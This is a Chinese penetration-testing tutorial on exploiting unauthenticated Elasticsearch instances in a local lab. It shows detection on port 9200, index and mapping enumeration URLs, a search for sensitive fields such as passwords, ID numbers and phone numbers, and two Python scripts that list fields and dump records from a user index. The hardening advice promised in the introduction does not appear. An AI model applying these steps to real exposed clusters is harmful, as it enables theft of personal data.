前言

本文包含

  • elasticsearch未授权
  • 如何构造查询语句来利用elasticsearch
  • elasticsearch 加固与修复建议

Windows 搭建elasticsearch
参考 elasticsearch Windows本地安装

elasticsearch 未授权探测

默认端口:9200
访问 url,提示如图信息,说明存在elasticsearch未授权
testpng

fscan等一些扫描工具,都会存在它的漏洞探测
testpng

yakit
testpng

利用elasticsearch未授权

  • 枚举数据库索引
    http://192.168.23.1:9200/_cat/indices?v

在count字段寻找非0的索引库。
testpng

  • 查看节点数据 http://192.168.23.1:9200/_nodes

通常默认索引库是以 . 开头的,我们可以通过python脚本打印非默认索引库,以及他们的属性信息。
testpng

代码见文章最后的 elasticsearch_index_field_query.py

通过http直接交互
http://192.168.23.1:9200/_all/_mapping?pretty
testpng

接着,我们就可以在打印的信息中寻找比较敏感的属性,比如 username, password, card,email,phone,key,secret。

比如案例中,我们能看到idcard,phone

接下来,我们想查询 userinfo 索引库的前十行信息,来验证是否存在敏感信息
testpng

代码见文章最后的elasticsearch_index_field_query2.py

下面的3就是userinfo索引库中所有的数据,方便我们在攻防演练中计算信息泄露的数量。

或者直接访问 http://192.168.23.1:9200/userinfo/_search ,默认打印10行
testpng

圈出来的就是总体数量

代码附录

elasticsearch_index_field_query.py

from elasticsearch import Elasticsearch

# 连接到 Elasticsearch
es = Elasticsearch([{'scheme': 'http', 'host': 'localhost', 'port': 9200}])

try:
    # 获取所有索引
    all_indices = es.indices.get_alias(index="*")
    print("Elasticsearch 中的非默认索引库有:")
    for index in all_indices:
        if not index.startswith('.'):
            print(index)

            # 获取索引的映射信息
            mapping = es.indices.get_mapping(index=index)
            print(f"索引 {index} 中的字段有:")
            for field in mapping[index]['mappings']['properties']:
                print(field)
            print()

except Exception as e:
    print(f"发生错误: {e}")
    

elasticsearch_index_field_query2.py

from elasticsearch import Elasticsearch

# 连接到 Elasticsearch
es = Elasticsearch([{'scheme': 'http', 'host': 'localhost', 'port': 9200}])

# 要查询的索引库
index_name = "userinfo"

try:
    # 查询前十行信息
    search_body = {
        "size": 10,
        "query": {
            "match_all": {}
        }
    }
    result = es.search(index=index_name, body=search_body)
    print("userinfo 索引库的前十行信息:")
    for hit in result['hits']['hits']:
        print(hit['_source'])

    # 统计该库中一共有多少文档
    count_result = result['hits']["total"]["value"]
    print(f"userinfo 索引库中文档总数为: {count_result}")

except Exception as e:
    print(f"发生错误: {e}")
    

参考资料

Logo

火山引擎开发者社区是火山引擎打造的AI技术生态平台,聚焦Agent与大模型开发,提供豆包系列模型(图像/视频/视觉)、智能分析与会话工具,并配套评测集、动手实验室及行业案例库。社区通过技术沙龙、挑战赛等活动促进开发者成长,新用户可领50万Tokens权益,助力构建智能应用。

更多推荐